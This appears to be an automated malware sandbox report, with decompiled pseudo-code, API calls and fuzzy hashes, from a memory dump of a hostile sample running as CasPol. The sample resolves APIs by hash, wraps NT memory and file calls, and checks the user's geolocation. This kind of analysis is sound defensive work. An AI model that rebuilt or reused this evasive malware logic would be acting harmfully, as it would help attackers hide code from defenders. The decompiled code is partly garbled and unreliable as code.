                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 172 41e643-41e68c call 41f203 NtReadFile
                                                                  C-Code - Quality: 37%
                                                                  			E0041E643(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                  				void* _t18;
                                                                  				intOrPtr* _t27;
                                                                  
                                                                  				_t3 = _a4 + 0xa74; // 0xa76
                                                                  				_t27 = _t3;
                                                                  				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
                                                                  				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                                  				return _t18;
                                                                  			}






                                                                  APIs
                                                                  • NtReadFile.NTDLL(004194D3,0041499B,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,0041499B,004194D3,00000002,00000000), ref: 0041E688
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                  • Instruction ID: aa4a829568f7423d39f4ec96ffd58af37ce6892a559b0f629fddbcd99df9d704
                                                                  • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                  • Instruction Fuzzy Hash: BAF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BE0DA7241C630E8118BA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 175 41e76d-41e7b0 call 41f203 NtAllocateVirtualMemory
                                                                  C-Code - Quality: 84%
                                                                  			E0041E76D(void* __edx, void* __fp0, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28, void* _a115) {
                                                                  				intOrPtr _v117;
                                                                  				long _t17;
                                                                  
                                                                  				asm("out 0xd1, al");
                                                                  				_v117 = _v117 + __edx;
                                                                  				_t13 = _a4;
                                                                  				_t5 = _t13 + 0x14; // 0x6ad04d03
                                                                  				_t6 = _t13 + 0xa8c; // 0x404083
                                                                  				E0041F203( *_t5, _a4, _t6,  *_t5, 0, 0x30);
                                                                  				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                  				return _t17;
                                                                  			}






                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035F7,00000004,00001000,00000000), ref: 0041E7AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
                                                                  • Instruction ID: 864ad69e3011cdc826fcdf3463504ce9b0c8951d6cc57d2b8f66622e5bcdf5d0
                                                                  • Opcode Fuzzy Hash: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
                                                                  • Instruction Fuzzy Hash: D3F034B2600208ABCB14DF98CC41EEB37ADAF88354F118119FE0997252C630E815CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 178 41e773-41e789 179 41e78f-41e7b0 NtAllocateVirtualMemory 178->179 180 41e78a call 41f203 178->180 180->179
                                                                  C-Code - Quality: 100%
                                                                  			E0041E773(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                  				long _t14;
                                                                  
                                                                  				_t10 = _a4;
                                                                  				_t2 = _t10 + 0x14; // 0x6ad04d03
                                                                  				_t3 = _t10 + 0xa8c; // 0x404083
                                                                  				E0041F203( *_t2, _a4, _t3,  *_t2, 0, 0x30);
                                                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                  				return _t14;
                                                                  			}





                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035F7,00000004,00001000,00000000), ref: 0041E7AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                  • Instruction ID: 1b90bcd36e8a78153eba8f51a40a1fce6fab4eed9a3e5dfa1b1f9faf88a12c54
                                                                  • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                  • Instruction Fuzzy Hash: 13F01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159FE0897241C630F811CBB4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0041E6C3(intOrPtr _a4, void* _a8) {
                                                                  				long _t8;
                                                                  
                                                                  				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                                  				_t8 = NtClose(_a8); // executed
                                                                  				return _t8;
                                                                  			}





                                                                  APIs
                                                                  • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                  • Instruction ID: 9ee9210bb05c48301ec95111c73dbb9c9ea8a797f0d2d2d6377b377fa5d8e709
                                                                  • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                  • Instruction Fuzzy Hash: 5ED01776604218ABD610EBA9DC89FD77BACDF48664F0184A9BA1C5B242C671FA0086E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0041E6BE(void* __edi, void* __esi, intOrPtr _a4, void* _a8) {
                                                                  				long _t9;
                                                                  
                                                                  				_t6 = _a4;
                                                                  				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t6, _t6 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                                  				_t9 = NtClose(_a8); // executed
                                                                  				return _t9;
                                                                  			}





                                                                  APIs
                                                                  • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
                                                                  • Instruction ID: a83627c48fb09607d7489d41a2bc8f9ecd1366b18a2a80a5dfb2e3b4a2810487
                                                                  • Opcode Fuzzy Hash: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
                                                                  • Instruction Fuzzy Hash: F5E08C7A600204ABD610EBA4CC45ED73BA9DF88224F018459BE195B342C270FA008BE0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 6504ea9ac095ab0c98d2c5fb0b3808906787fb60af23a640be42e77ebd187dec
                                                                  • Instruction ID: bcb3071a78016d8281ce9657f0afd0568acc81b534edf3d7cc38a02aa8074a37
                                                                  • Opcode Fuzzy Hash: 6504ea9ac095ab0c98d2c5fb0b3808906787fb60af23a640be42e77ebd187dec
                                                                  • Instruction Fuzzy Hash: 38900265711000032105A59907045070046A7E5391351C022F1005591CD77188616165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 63%
                                                                  			E0040990D(void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
                                                                  				char _v63;
                                                                  				char _v64;
                                                                  				char _v68;
                                                                  				void* _t13;
                                                                  				int _t15;
                                                                  				long _t30;
                                                                  				int _t33;
                                                                  				void* _t36;
                                                                  				void* _t38;
                                                                  				void* _t43;
                                                                  
                                                                  				_t43 = __eflags;
                                                                  				_pop(_t38);
                                                                  				asm("sbb al, 0x83");
                                                                  				asm("les edx, [ebp-0x75]");
                                                                  				_t36 = _t38;
                                                                  				_v64 = 0;
                                                                  				E004201D3( &_v63, 0, 0x3f);
                                                                  				E00420C83( &_v64, 3);
                                                                  				_t19 = _a4;
                                                                  				_t13 = E0040CF93(_t43, _a4 + 0x20,  &_v68); // executed
                                                                  				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E93(0xe49e13e4));
                                                                  				_t33 = _t15;
                                                                  				if(_t33 != 0) {
                                                                  					_t30 = _a8;
                                                                  					_t15 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
                                                                  					if(_t15 == 0) {
                                                                  						_t15 =  *_t33(_t30, 0x8003, _t36 + (E0040C663(1, 8, _t19 + 0x39c) & 0x000000ff) - 0x40, _t15);
                                                                  					}
                                                                  				}
                                                                  				return _t15;
                                                                  			}

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: a45e96f904ba6af220e1e6b5eef84503465f32b7258073bff8e907eb5740a78b
                                                                  • Instruction ID: 20480c24435e97d483933209d4d63d1bd1c3dc92514e9563bbea3aa723060474
                                                                  • Opcode Fuzzy Hash: a45e96f904ba6af220e1e6b5eef84503465f32b7258073bff8e907eb5740a78b
                                                                  • Instruction Fuzzy Hash: 16110C71A4022476EB21A6A1DC83FFF776CDB45B44F14012EFE04BA1C2D6A9690587E9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 107 409913-409924 108 40992d-409967 call 420c83 call 40cf93 call 402e93 call 4195b3 107->108 109 409928 call 4201d3 107->109 119 4099a0-4099a6 108->119 120 409969-40997a PostThreadMessageW 108->120 109->108 120->119 121 40997c-40999d call 40c663 120->121 121->119
                                                                  C-Code - Quality: 84%
                                                                  			E00409913(void* __eflags, intOrPtr _a4, long _a8) {
                                                                  				char _v67;
                                                                  				char _v68;
                                                                  				void* _t13;
                                                                  				int _t15;
                                                                  				long _t25;
                                                                  				int _t27;
                                                                  				void* _t28;
                                                                  				void* _t32;
                                                                  
                                                                  				_t32 = __eflags;
                                                                  				_v68 = 0;
                                                                  				E004201D3( &_v67, 0, 0x3f);
                                                                  				E00420C83( &_v68, 3);
                                                                  				_t19 = _a4;
                                                                  				_t13 = E0040CF93(_t32, _a4 + 0x20,  &_v68); // executed
                                                                  				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E93(0xe49e13e4));
                                                                  				_t27 = _t15;
                                                                  				if(_t27 != 0) {
                                                                  					_t25 = _a8;
                                                                  					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
                                                                  					if(_t15 == 0) {
                                                                  						return  *_t27(_t25, 0x8003, _t28 + (E0040C663(1, 8, _t19 + 0x39c) & 0x000000ff) - 0x40, _t15);
                                                                  					}
                                                                  				}
                                                                  				return _t15;
                                                                  			}

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: 88885eb971ee9bf2be674d98dac1b17f9e40f8ae4f2a1e710c07d70908d087d4
                                                                  • Instruction ID: 99f33223a06979dd19497cd07b2eb0eced799e52382c08ed34ba0aba74cfe4fe
                                                                  • Opcode Fuzzy Hash: 88885eb971ee9bf2be674d98dac1b17f9e40f8ae4f2a1e710c07d70908d087d4
                                                                  • Instruction Fuzzy Hash: BB01C871A4031476E721A691DC82FEF376C9B44B44F44012AFE04BA2C2D6A8690586E9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 124 41e9f4-41e9f8 125 41e9c0-41e9f3 call 41f203 124->125 126 41e9fb-41ea1d call 41f203 124->126 129 41ea22-41ea37 LookupPrivilegeValueW 126->129
                                                                  C-Code - Quality: 37%
                                                                  			E0041E9F4(void* __eax, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
                                                                  				intOrPtr _v0;
                                                                  				int _t13;
                                                                  
                                                                  				asm("stc");
                                                                  				asm("out dx, al");
                                                                  				asm("repne jo 0xffffffc8");
                                                                  				_push(_t22);
                                                                  				_t10 = _v0;
                                                                  				E0041F203( *((intOrPtr*)(_v0 + 0x6d4)), _t10, _t10 + 0xab8,  *((intOrPtr*)(_v0 + 0x6d4)), 0, 0x46);
                                                                  				_t13 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
                                                                  				return _t13;
                                                                  			}

                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA33
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                  • Instruction ID: 37147ff059de123ca1daa7b680345aa8e6bf5e2ed93d8c122108e99bdf0e5716
                                                                  • Opcode Fuzzy Hash: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                  • Instruction Fuzzy Hash: D30169B66002086FDB14EF99DC81EEB37ADAF89354F058159FE0997242C235E8558BF0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 132 4099a7-4099aa 133 409930-409967 call 420c83 call 40cf93 call 402e93 call 4195b3 132->133 134 4099ac-4099b2 132->134 143 4099a0-4099a6 133->143 144 409969-40997a PostThreadMessageW 133->144 144->143 145 40997c-40999d call 40c663 144->145 145->143
                                                                  C-Code - Quality: 75%
                                                                  			E004099A7(void* __eax, void* __ebx, void* __edx, signed int __esi, intOrPtr _a8, int _a12, char* _a16) {
                                                                  				intOrPtr _v0;
                                                                  				char* _v8;
                                                                  				char* _v12;
                                                                  				char _v64;
                                                                  				char* _v132;
                                                                  				char* _v136;
                                                                  				char _v656;
                                                                  				char* _v668;
                                                                  				char _v688;
                                                                  				char* _v692;
                                                                  				intOrPtr __edi;
                                                                  				void* _t64;
                                                                  				int _t66;
                                                                  				char* _t73;
                                                                  				long _t79;
                                                                  				int _t82;
                                                                  				signed int _t84;
                                                                  
                                                                  				_t84 = __esi * 0xffffffef;
                                                                  				_t90 = _t84;
                                                                  				if(_t84 > 0) {
                                                                  					E00420C83(_t73, 3);
                                                                  					_t70 = _a8;
                                                                  					_t64 = E0040CF93(_t90, _a8 + 0x20,  &_v64); // executed
                                                                  					_t66 = E004195B3(_a8 + 0x20, _t64, 0, 0, E00402E93(0xe49e13e4));
                                                                  					_t82 = _t66;
                                                                  					if(_t82 != 0) {
                                                                  						_t79 = _a12;
                                                                  						_t66 = PostThreadMessageW(_t79, 0x111, 0, 0); // executed
                                                                  						if(_t66 == 0) {
                                                                  							_t66 =  *_t82(_t79, 0x8003, _t84 + (E0040C663(1, 8, _t70 + 0x39c) & 0x000000ff) - 0x40, _t66);
                                                                  						}
                                                                  					}
                                                                  					return _t66;
                                                                  				} else {
                                                                  					__eax = __eax + 0x90e7dfc8;
                                                                  					__ebx = __ebx + 1;
                                                                  					__eflags = __ebx;
                                                                  					_push(__edx);
                                                                  					_push(__ebp);
                                                                  					__ebp = __esp;
                                                                  					__esp = __esp - 0x2ac;
                                                                  					_push(__ebx);
                                                                  					_push(__esi);
                                                                  					_push(__edi);
                                                                  					__eax = 0;
                                                                  					_v12 = 0;
                                                                  					_v692 = 0;
                                                                  					 &_v688 = E004201D3( &_v688, 0, 0x2a4);
                                                                  					__esi = _a12;
                                                                  					__ecx =  *((intOrPtr*)(__esi + 0x300));
                                                                  					__edi = _v0;
                                                                  					__eax = E00409913(__eflags, __edi,  *((intOrPtr*)(__esi + 0x300))); // executed
                                                                  					__eax = E0041FA23(__ecx);
                                                                  					_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
                                                                  					__ebx = __eax + _t15;
                                                                  					_a12 = 0;
                                                                  					while(1) {
                                                                  						__eax = E00410363(__edi, 0xfe363c80); // executed
                                                                  						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                                  						__eax =  &_v688;
                                                                  						__eax = E0041E733(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
                                                                  						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                                                  						__eflags = __eax;
                                                                  						if(__eax < 0) {
                                                                  							break;
                                                                  						}
                                                                  						__eflags = _v656;
                                                                  						if(_v656 == 0) {
                                                                  							L12:
                                                                  							__eax = _a16;
                                                                  							__eax = _a16 + 1;
                                                                  							_a16 = __eax;
                                                                  							__eflags = __eax - 2;
                                                                  							if(__eax < 2) {
                                                                  								continue;
                                                                  							} else {
                                                                  								__ebx = _v8;
                                                                  								goto L16;
                                                                  							}
                                                                  						} else {
                                                                  							__eflags = _v668;
                                                                  							if(_v668 == 0) {
                                                                  								goto L12;
                                                                  							} else {
                                                                  								__eflags = _v136;
                                                                  								if(_v136 == 0) {
                                                                  									goto L12;
                                                                  								} else {
                                                                  									__eflags = _v132;
                                                                  									if(_v132 != 0) {
                                                                  										__eax = _a12;
                                                                  										__edx =  &_v688;
                                                                  										__ebx = 1;
                                                                  										__eax = E00420153(_a12,  &_v688, 0x2a8);
                                                                  										L16:
                                                                  										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                                  										__eax = E0041E6C3(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
                                                                  										__eflags = __ebx;
                                                                  										if(__ebx == 0) {
                                                                  											break;
                                                                  										} else {
                                                                  											__edx = _v668;
                                                                  											__eax = _a12;
                                                                  											__ecx = _v136;
                                                                  											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
                                                                  											__edx =  *((intOrPtr*)(__esi + 0x2d0));
                                                                  											_t35 = __esi + 0x2e8; // 0x2e8
                                                                  											__eax = _t35;
                                                                  											 *_t35 = _v136;
                                                                  											__eax = _a12;
                                                                  											_t37 = __esi + 0x314; // 0x314
                                                                  											__ebx = _t37;
                                                                  											__ecx = 0;
                                                                  											__eax = _a12 + 0x220;
                                                                  											 *__ebx = 0x18;
                                                                  											 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                  											 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                  											 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                  											 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                  											 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                  											__eax = E0041DF43(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
                                                                  											__ecx = 0;
                                                                  											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                                                  											__eflags = __eax;
                                                                  											if(__eax < 0) {
                                                                  												break;
                                                                  											} else {
                                                                  												__edx = _v132;
                                                                  												_t45 = __esi + 0x2e0; // 0x2e0
                                                                  												__eax = _t45;
                                                                  												 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                  												 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                  												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                  												 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                  												 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                  												_a12 = _a12 + 0x224;
                                                                  												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
                                                                  												 *__ebx = 0x18;
                                                                  												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
                                                                  												__eax = E0041DF83(__edi, _a12 + 0x224, 0x1a, __ebx, _t45);
                                                                  												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                                                  												__eflags = __eax;
                                                                  												if(__eax < 0) {
                                                                  													break;
                                                                  												} else {
                                                                  													__edx = _a8;
                                                                  													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
                                                                  													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
                                                                  													__eax = E0041F6C3(__ecx);
                                                                  													__ebx = __eax;
                                                                  													__eax =  *((intOrPtr*)(__ebx + 0x28));
                                                                  													__eax = E00420373( *((intOrPtr*)(__ebx + 0x28)));
                                                                  													__edx =  *((intOrPtr*)(__ebx + 0x28));
                                                                  													_t60 = __eax + 2; // 0x2
                                                                  													__ecx = __eax + _t60;
                                                                  													__eax = E00420153(__esi,  *((intOrPtr*)(__ebx + 0x28)), __eax + _t60);
                                                                  													__eax =  &_v656;
                                                                  													_push( &_v656);
                                                                  													__eax = E004191A3(); // executed
                                                                  													__esp = __esp + 0x28;
                                                                  													__edi = __edi;
                                                                  													_pop(__esi);
                                                                  													__ebx = 2;
                                                                  													__esp = __ebp;
                                                                  													__ebp = 0;
                                                                  													return __eax;
                                                                  												}
                                                                  											}
                                                                  										}
                                                                  									} else {
                                                                  										goto L12;
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  						goto L20;
                                                                  					}
                                                                  					_pop(__edi);
                                                                  					_pop(__esi);
                                                                  					__eax = 0;
                                                                  					__eflags = 0;
                                                                  					_pop(__ebx);
                                                                  					__esp = __ebp;
                                                                  					_pop(__ebp);
                                                                  					return 0;
                                                                  				}
                                                                  				L20:
                                                                  			}





















                                                                  APIs
                                                                  • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: da7c32538520bc46c9b883dd194686ad874100c3146dbe5130bb82354df0f293
                                                                  • Instruction ID: 648afeff1364fdba1a395c652430271767a4361657bae9f95ab056a44fdb6ef5
                                                                  • Opcode Fuzzy Hash: da7c32538520bc46c9b883dd194686ad874100c3146dbe5130bb82354df0f293
                                                                  • Instruction Fuzzy Hash: D201A7B2A4031476E6215651EC83FAF2358DB84B14F14412EFE04BA2C2D5EDAD0546E9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 186 41e863-41e894 call 41f203 RtlAllocateHeap
                                                                  C-Code - Quality: 100%
                                                                  			E0041E863(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                  				void* _t10;
                                                                  
                                                                  				_t3 = _a4 + 0xa9c; // 0xa9c
                                                                  				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                                  				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                  				return _t10;
                                                                  			}





                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00418C66,?,00419410,00419410,?,00418C66,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E890
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                  • Instruction ID: 141f3d952d026ec1b8dbe03c6c75eaaf96d710a32fd8771451468f3a68ee1817
                                                                  • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                  • Instruction Fuzzy Hash: 60E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C630F914CAF1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 181 4100c3-4100e7 call 4195b3 184 4100e9-4100ea 181->184 185 4100eb-4100fc GetUserGeoID 181->185
                                                                  C-Code - Quality: 37%
                                                                  			E004100C3(intOrPtr _a4) {
                                                                  				intOrPtr* _t7;
                                                                  				void* _t8;
                                                                  
                                                                  				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
                                                                  				if(_t7 != 0) {
                                                                  					_t8 =  *_t7(0x10); // executed
                                                                  					return 0 | _t8 == 0x000000f1;
                                                                  				} else {
                                                                  					return _t7;
                                                                  				}
                                                                  			}






                                                                  APIs
                                                                  • GetUserGeoID.KERNELBASE(00000010), ref: 004100ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: User
                                                                  • String ID:
                                                                  • API String ID: 765557111-0
                                                                  • Opcode ID: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
                                                                  • Instruction ID: d3a3e2032565f6d34a55456b5a80270182852c25dcf9d34bac0e0dafc7ea0ddc
                                                                  • Opcode Fuzzy Hash: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
